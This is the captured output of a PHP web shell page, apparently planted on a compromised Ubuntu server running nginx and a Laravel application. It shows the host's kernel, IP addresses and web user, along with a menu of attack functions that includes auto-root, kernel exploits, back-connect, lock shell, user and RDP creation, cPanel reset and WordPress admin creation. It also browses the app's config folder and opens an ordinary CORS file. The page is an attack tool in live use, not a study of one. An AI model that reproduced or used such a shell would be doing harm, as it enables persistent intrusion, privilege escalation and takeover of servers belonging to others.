Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
honeycomb /
src /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
9.15
KB
-rwxrwxr-x
auth.php
3.58
KB
-rwxrwxr-x
broadcasting.php
1.67
KB
-rwxrwxr-x
cache.php
3.2
KB
-rwxrwxr-x
cors.php
846
B
-rwxrwxr-x
database.php
4.94
KB
-rwxrwxr-x
filesystems.php
2.36
KB
-rwxrwxr-x
hashing.php
1.53
KB
-rwxrwxr-x
logging.php
2.98
KB
-rwxrwxr-x
mail.php
3.45
KB
-rwxrwxr-x
queue.php
2.84
KB
-rwxrwxr-x
sanctum.php
1.72
KB
-rwxrwxr-x
services.php
950
B
-rwxrwxr-x
session.php
6.88
KB
-rwxrwxr-x
view.php
1.03
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cors.php
<?php return [ /* |-------------------------------------------------------------------------- | Cross-Origin Resource Sharing (CORS) Configuration |-------------------------------------------------------------------------- | | Here you may configure your settings for cross-origin resource sharing | or "CORS". This determines what cross-origin operations may execute | in web browsers. You are free to adjust these settings as needed. | | To learn more: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS | */ 'paths' => ['api/*', 'sanctum/csrf-cookie'], 'allowed_methods' => ['*'], 'allowed_origins' => ['*'], 'allowed_origins_patterns' => [], 'allowed_headers' => ['*'], 'exposed_headers' => [], 'max_age' => 0, 'supports_credentials' => false, ];
Close